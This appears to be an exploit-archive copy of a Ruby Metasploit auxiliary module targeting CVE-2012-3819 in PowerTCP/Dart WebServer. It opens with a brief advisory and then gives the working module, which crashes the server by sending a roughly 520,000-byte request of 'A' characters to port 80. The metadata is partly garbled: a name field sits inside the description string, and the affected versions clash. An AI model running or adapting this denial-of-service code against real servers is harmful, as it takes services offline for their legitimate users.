54 lines
No EOL
1.4 KiB
Ruby
Executable file
54 lines
No EOL
1.4 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/55761/info
|
|
|
|
PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
|
|
|
|
Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
|
|
|
|
PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Auxiliary::Dos
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Description' => %q{ 'Name' => 'Dart Webserver
|
|
<= 1.9.0 Stack Overflow',
|
|
Dart Webserver from Dart Communications throws a stack
|
|
overflow exception
|
|
when processing large requests.
|
|
}
|
|
,
|
|
'Author' => [
|
|
'catatonicprime'
|
|
],
|
|
'Version' => '$Revision: 15513 $',
|
|
'License' => MSF_LICENSE,
|
|
'References' => [
|
|
[ 'CVE', '2012-3819' ],
|
|
],
|
|
'DisclosureDate' => '9/28/2012'))
|
|
|
|
register_options([
|
|
Opt::RPORT(80),
|
|
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
|
|
'520000' ])
|
|
])
|
|
end
|
|
def run
|
|
serverIP = datastore['RHOST']
|
|
if (datastore['RPORT'].to_i != 80)
|
|
serverIP += ":" + datastore['RPORT'].to_s
|
|
end
|
|
size = datastore['SIZE']
|
|
|
|
print_status("Crashing the server ...")
|
|
request = "A" * size + "\r\n\r\n"
|
|
connect
|
|
sock.put(request)
|
|
disconnect
|
|
|
|
end
|
|
end |